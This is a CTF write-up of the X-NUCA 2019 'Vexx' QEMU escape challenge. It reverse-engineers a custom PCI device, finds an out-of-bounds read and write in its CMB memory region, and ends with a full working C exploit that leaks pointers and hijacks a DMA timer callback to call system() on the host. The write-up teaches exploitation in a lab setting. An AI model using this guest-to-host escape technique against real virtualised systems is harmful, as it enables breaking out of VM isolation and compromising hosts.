Mid Station

[X-NUCA 2019] Vexx - Qemu Escape

生活,总是在理所当然的挫折与不期而遇的惊喜之间变得层次分明。

This was my first time to finish a “Real-world” style challenge in CTF game. Having so much fun on this Qemu escape challenge, I learned a lot about how Linux drivers work with the low-level devices when solving this challenge. Our team stands on the fifth place at the end. See you at Shenzhen by the end of 2019!

You can download the challenge zip file from this link: vexx.zip. The login username is root, and password is goodluck. If you want to learn virualization related pwning topic, I believe this will be a good starting point.

Recon

The structure of the provided archive file looks like this:

1
2
3
4
5
6
7
.
├── bzImage
├── initramfs
├── launch.sh
├── pc-bios
├── qemu-system-x86_64
└── rootfs.ext2

Let’s see what launch.sh tells us:

1
2
#!/bin/sh
./qemu-system-x86_64 -hda rootfs.ext2 -kernel bzImage -m 64M -append "console=ttyS0 root=/dev/sda oops=panic panic=1" -L ./pc-bios -netdev user,id=mynet0 -device rtl8139,netdev=mynet0 -nographic -device vexx -snapshot

I can tell two suspicious terms at the first glaze, the first one is -L ./pc-bios, it tells us this is used to set the directory for the BIOS, VGA BIOS and keymaps in --help command. The second unusual term is -device vexx, it seems like the designer implemented a custom device, so this is very likely the correct place to look for vulnerabilities.
After running launch.sh and login as it suggested. it gives us a root shell.

1
2
3
4
5
Welcome to VM world!
NeSE login: root
Password:
# id
uid=0(root) gid=0(root) groups=0(root),10(wheel)

So this challenge assumes we have full control of the guest system and our target is reading the flag file from the host machine. My teammate suggested some Qemu escape writup from previous CTFs: HITB GSEC 2017: babyqemu, Hitb 2017 - Babyqemu. The writeups pointed out that the custom devices code is located in the emulator binary file. The provided emulator is version 4.0.0, so I downloaded the corresponding source and compiled it. Then I feed them to bindiff and see the modifications. Sorting the functions by difference, soon we can see a function called vexx_mmio_write. Well, seems this is it, if we search the string “vexx” in function window, there are more related functions.

As suggested by previous writeups, first we can easily found the device state structure in Local Types window.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
struct VexxState
{
PCIDevice_0 pdev;
MemoryRegion_0 mmio;
MemoryRegion_0 cmb;
PortioList_0 port_list;
QemuThread_0 thread;
QemuMutex_0 thr_mutex;
QemuCond_0 thr_cond;
_Bool stopping;
uint32_t addr4;
uint32_t fact;
uint32_t status;
uint32_t irq_status;
uint32_t memorymode;
VexxRequest req;
VexxDma vexxdma;
};

and its related strutures:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
struct VexxRequest
{
uint32_t state;
uint32_t offset;
char req_buf[256];
};
struct VexxDma
{
uint32_t state;
dma_state dma;
QEMUTimer_0 dma_timer;
char dma_buf[4096];
uint64_t dma_mask;
};

Thanks to the debug symbols, these look pretty readable. Then we can start investing the code from vexx_class_init:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
void __fastcall vexx_class_init(ObjectClass_0 *a1, void *data)
{
PCIDeviceClass *pdev; // rbx
PCIDeviceClass *v3; // rax

pdev = (PCIDeviceClass *)object_class_dynamic_cast_assert(
a1,
(const char *)&implements_type,
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
549,
"vexx_class_init");
v3 = (PCIDeviceClass *)object_class_dynamic_cast_assert(
a1,
"pci-device",
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
550,
"vexx_class_init");
*(_DWORD *)&v3->vendor_id = 0x11E91234;
v3->revision = 16;
v3->realize = (void (*)(PCIDevice_0 *, Error_0 **))pci_vexx_realize;
v3->exit = (PCIUnregisterFunc *)pci_vexx_uninit;
v3->class_id = 255;
pdev->parent_class.categories[0] |= 0x80uLL;
}

This function specified the vendor_id at line 18, and it registered the realize function and exit function. So we can follow up to realize function pci_vexx_realize:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
void __fastcall pci_vexx_realize(PCIDevice *pdev, Error_0 **errp)
{
VexxState *state; // rbx
MemoryRegion_0 *v3; // rax

state = (VexxState *)object_dynamic_cast_assert(
&pdev->qdev.parent_obj,
"vexx",
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
482,
"pci_vexx_realize");
pdev->config[61] = 1;
if ( !msi_init(pdev, 0, 1u, 1, 0, errp) )
{
timer_init_full(
&state->vexxdma.dma_timer,
0LL,
QEMU_CLOCK_VIRTUAL,
1000000,
0,
(QEMUTimerCB *)vexx_dma_timer,
state);
qemu_mutex_init(&state->thr_mutex);
qemu_cond_init(&state->thr_cond);
qemu_thread_create(&state->thread, "vexx", (void *(*)(void *))vexx_fact_thread, state, 0);
memory_region_init_io(&state->mmio, &state->pdev.qdev.parent_obj, &vexx_mmio_ops, state, "vexx-mmio", 0x1000uLL);
memory_region_init_io(&state->cmb, &state->pdev.qdev.parent_obj, &vexx_cmb_ops, state, "vexx-cmb", 0x4000uLL);
portio_list_init(&state->port_list, &state->pdev.qdev.parent_obj, vexx_port_list, state, "vexx");
v3 = pci_address_space_io(pdev);
portio_list_add(&state->port_list, v3, 0x230u);
pci_register_bar(pdev, 0, 0, &state->mmio);
pci_register_bar(pdev, 1, 4u, &state->cmb);
}
}

From line 26~30 is what really matters here. Line 26 and 27 share the same pattern, in short,it initializes two memory region for memory-mapped I/O, and bind corresponding operations functions to them. Line 28~30 initialize another I/O method. It defines a range of I/O port numbers for specified operations.

Vulnerabilites

cmb_mmio

From previous chapter we figure out what operations the devices provided to interact with. There are two MMIO region call vexx-mmio and vexx-cmb, and a series of I/O ports from 0x230. Each I/O channel is bound to read and write methods. Let’s start from vexx_cmb_read and vexx_cmb_write:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int64_t __fastcall vexx_cmb_read(VexxState *state, hwaddr addr, unsigned int size)
{
uint32_t memorymode; // eax
uint64_t result; // rax

memorymode = state->memorymode;
if ( memorymode & 1 )
{
result = 255LL;
if ( addr > 0x100 )
return result;
LODWORD(addr) = state->req.offset + addr;
goto LABEL_4;
}
if ( !(memorymode & 2) )
{
result = 255LL;
if ( addr > 0x100 )
return result;
goto LABEL_4;
}
result = 255LL;
if ( addr - 0x100 > 0x50 )
return result;
LODWORD(addr) = addr - 256;
LABEL_4:
result = *(_QWORD *)&state->req.req_buf[(unsigned int)addr];
return result;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
void __fastcall vexx_cmb_write(VexxState *state, hwaddr addr, uint64_t val, unsigned int size)
{
uint32_t memorymode; // eax
hwaddr v5; // rax

memorymode = state->memorymode;
if ( memorymode & 1 )
{
if ( addr > 0x100 )
return;
LODWORD(addr) = state->req.offset + addr;
goto LABEL_4;
}
if ( !(memorymode & 2) )
{
if ( addr > 0x100 )
return;
goto LABEL_4;
}
v5 = addr - 256;
LODWORD(addr) = addr - 256;
if ( v5 <= 0x50 )
LABEL_4:
*(_QWORD *)&state->req.req_buf[(unsigned int)addr] = val;
}

The code is neat. These functions basically perform R/W operations on state->req.req_buf, which is a buffer in size of 0x100. I notice that if we can control state->memorymode to 1 and state->req.offset to non-zero value, so we can hit line 11 and perform out-of-bound read/write.

Following this idea, we can find these varibles were initialized in vexx_instance_init:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
void __fastcall vexx_instance_init(__int64 obj)
{
VexxState *state; // rax

state = (VexxState *)object_dynamic_cast_assert(
(Object_0 *)obj,
"vexx",
"/home/giglf/workbench/learn/qemu-4.0.0/hw/misc/vexx.c",
538,
"vexx_instance_init");
state->memorymode = 4;
state->req.offset = 0;
state->vexxdma.dma_mask = 0xFFFFFFFLL;
object_property_add(
(Object_0 *)obj,
"dma_mask",
"uint64",
(ObjectPropertyAccessor *)vexx_obj_uint64,
(ObjectPropertyAccessor *)vexx_obj_uint64,
0LL,
&state->vexxdma.dma_mask,
0LL);
}

Port I/O

Soon I found that we can control those varialbes through port I/O.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void __fastcall vexx_ioport_write(VexxState *opaque, uint32_t addr, uint32_t val)
{
if ( addr - 560 <= 0x20 )
{
switch ( addr )
{
case 0x240u:
opaque->req.offset = val;
break;
case 0x250u:
opaque->req.state = val;
break;
case 0x230u:
opaque->memorymode = val;
break;
}
}
}

Well, the idea is pretty clear now, we can combine these two I/O operations and perform OOB R/W on VexxState object. Right after state->req.reqbuf is an VexxDma object called vexxdma.

Debugging setup

Remeber that our attack target is Qemu emulator itself, so we can simply attach gdb to the running process, like sudo gdb attach (pidof qemu-system-x86_64). And we need to copy the exp into the guest machine. My solution here is to mount the provided ext2 file and copy our exp into it, then lauch the virtual machine again.

1
2
3
sudo mount ./rootfs.ext2 ./rootfs -t ext2
sudo cp $EXP_DIR/bin/release/exp rootfs/exp
sudo umount ./rootfs

Exploitation

Talking to mmio

The first step is to find a way to talking to the device and make it invokes vulnerable functions. Hitb 2017 - Babyqemu shows how to locate the mmio file in details.
As for this challenge, we can identify two mmio file according to the size.

1
2
-rw------- 1 root root 16384 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource1 [vexx-cmb]
-rw------- 1 root root 4096 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource0 [vexx-mmio]

Then we can setup the mmio from userspace:

1
2
int fdcmb =  open("/sys/devices/pci0000:00/0000:00:04.0/resource1", O_RDWR|O_SYNC);
void * cmb = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fdcmb, 0);

If we setup a breakpoint at vexx_cmb_write, and copy some data to cmb, we can see the breakpoint is hitted.

Talking to port I/O

The previous writeups didn’t cover the knowledge about how to talk to the port I/O. So I spent some time to figure out it by myself. Using I/O ports in C programs introduce that we can access the I/O port by inb(port) and outb(value, port). Before that, we also need to setup the permission by ioperm().
The question for us now is what is the io number? From pci_vexx_realize, it gives us some hits like:

1
2
3
portio_list_init(&state->port_list, &state->pdev.qdev.parent_obj, vexx_port_list, state, "vexx");
v3 = pci_address_space_io(pdev);
portio_list_add(&state->port_list, v3, 0x230u);

It seems that it start from 0x230, and vexx_ioport_writeis where we can comfirm our guess:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
void __fastcall vexx_ioport_write(VexxState *opaque, uint32_t addr, uint32_t val)
{
if ( addr - 560 <= 0x20 )
{
switch ( addr )
{
case 0x240u:
opaque->req.offset = val;
break;
case 0x250u:
opaque->req.state = val;
break;
case 0x230u:
opaque->memorymode = val;
break;
}
}
}

Port number 0x230 for accessing memorymode, and 0x240 for req.offset. That all we need to perform a OOB R/W.

Leaking & Hijacking

With the OOB ability, we need to comfirm its impact, that is, take a look at what we can leak or overwrite from the object. We can set a breakpoint at veex_cmb_mmio, and see how the VeexState object looks like using the command p *(VexxState *) $rdi ,as $rdi points to the object itself now.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
pwndbg> p *(VexxState *) $rdi
$1 = {
pdev = {
qdev = {
parent_obj = {
class = 0x564be72500f0,
free = 0x7f0cc7e56ba0 <g_free>,
properties = 0x564be7f07f60,
ref = 23,
parent = 0x564be727f200
},
......
......
......
irq_status = 0,
memorymode = 4,
req = {
state = 0,
offset = 0,
req_buf = '\000' <repeats 255 times> [!!OOB HAPPEN HERE!!]
},
vexxdma = {
state = 0,
dma = {
src = 0,
dst = 0,
cnt = 0,
cmd = 0
},
dma_timer = {
expire_time = -1,
timer_list = 0x564be7256e10,
cb = 0x564be4e69f10 <vexx_dma_timer>,
opaque = 0x564be7f292c0,
next = 0x0,
attributes = 0,
scale = 1000000
},
dma_buf = '\000' <repeats 4095 times>,
dma_mask = 268435455
}
}

Once printed out the structure, it becomes very clear. We can leak the code address from dma_timer.cb, it points to the address of vexx_dma_timer, and there is a heap address at dma_timer.opaque, it happens to point to the VexxState object itself.

Of course we can overwrite these two pointers, the dma_timer.cb seems will be triggered by some kind of timing mechanism. After some investigation, I found that the cb function can be triggered indirectly by a special command in vexx_mmio_write:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void __fastcall vexx_mmio_write(VexxState *vexx, hwaddr addr, uint64_t val, unsigned int size)
{
......
else if ( addr == 0x98 && val & 1 && !(vexx->vexxdma.dma.cmd & 1) )
{
vexx->vexxdma.dma.cmd = val;
v8 = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);
timer_mod(
&vexx->vexxdma.dma_timer,
((signed __int64)((unsigned __int128)(0x431BDE82D7B634DBLL * (signed __int128)v8) >> 64) >> 18)
- (v8 >> 63)
+ 100);
}
}
}

The vexx_mmio_write will register an event to the timer instead of writing the value right away. And when the time’s up, it will call dma_timer.cb, the first argument is dma_timer.opaque. Therefore, we can use OOB to write dma_timer.cb to system@plt, and dma_time.opaque points to "/bin/sh". When the timer is triggered, it can give us a shell! Well, after some trying system("/bin/sh"); does not work as the emulator just hang there, but we can instead use system("cat flag") to obtain the glory flag!

Exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <dirent.h>
#include <time.h>
#include <signal.h>
#include <sys/auxv.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/uio.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sched.h>
#include <sys/io.h>

#define PORT_MEMORYMODE 0X230
#define PORT_OFFSET 0X240
#define PORT_STATE 0x250

// -rw------- 1 root root 16384 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource1 [vexx-cmb]
// -rw------- 1 root root 4096 Aug 24 02:13 /sys/devices/pci0000:00/0000:00:04.0/resource0 [vexx-mmio]

char* cmb;
char* mmio;

size_t leak_code = 0;
size_t leak_heap = 0;
size_t code = 0;
size_t cmd_str = 0;

void die(const char* msg)
{
perror(msg);
exit(-1);
}

void cmbwrite(uint64_t addr, uint64_t value)
{
*((uint64_t*)(cmb + addr)) = value;
}

uint64_t cmbread(uint64_t addr)
{
return *((uint64_t*)(cmb+ addr));
}


void do_leak() {
//0x55fa155ecf10 (vexx_dma_timer) at req_buf[0x138]
strcpy(cmb, "/bin/cat flag\x00");
outb(0xf0, PORT_OFFSET);
outb(0x1, PORT_MEMORYMODE);
leak_code = cmbread(0x138-0xf0); // cb = vexx_dma_timer
leak_heap = cmbread(0x140-0xf0); // opaque = state
}

void hijack() {
size_t system = code + 0x2ab860;
cmbwrite(0x138-0xf0, system); // rip ;
cmbwrite(0x140-0xf0, cmd_str); // rdi ;
}


void trigger() {
*((int32_t*)(mmio + 0x98)) = 1;
}

int main(int argc, char *argv[]) {
(void)argc; (void)argv;
int res = 0;
int fdcmb = open("/sys/devices/pci0000:00/0000:00:04.0/resource1", O_RDWR|O_SYNC);
if (fdcmb < 0) {
die("fdcmb open");
}
cmb = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fdcmb, 0);
if (cmb == MAP_FAILED) {
die("cmb");
}

int fdmmio = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR|O_SYNC);
if (fdmmio < 0) {
die("fdmmio open");
}
mmio = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fdmmio, 0);
if (mmio == MAP_FAILED) {
die("mmio");
}

res = ioperm(0x230, 0x30, 1);
if (res < 0) {
die("ioperm");
}

do_leak();
printf("leak code: 0x%lx\n", leak_code);
code = leak_code-0x4dcf10;
printf("code: 0x%lx\n", code);
printf("leak heap: 0x%lx\n", leak_heap);
cmd_str = leak_heap + 0xb90;
printf("cmd: 0x%lx\n", cmd_str);

hijack();
trigger();

return 0;
}

Wrapup

This challenge is not as difficult as it looks. Qemu escape sounds scary, but the vulnerability logic is simple and exploitation is kind of straight-forward. Just require some patient and confident! From this challenge, I learned how to access the low-level devices from the userspace with mmio or port-io. I think building the exploit from these communication channels is the general pattern of VM-escape style CTF challenge.

References

  1. https://uaf.io/exploitation/2018/11/22/Hitb-2017-babyqemu.html
  2. https://kitctf.de/writeups/hitb2017/babyqemu
  3. https://bbs.pediy.com/thread-252385.htm
  4. https://blog.eadom.net/writeups/qemu-escape-vm-escape-from-0ctf-2017-finals-writeup/
  5. https://dangokyo.me/2018/03/25/hitb-xctf-2017-babyqemu-write-up/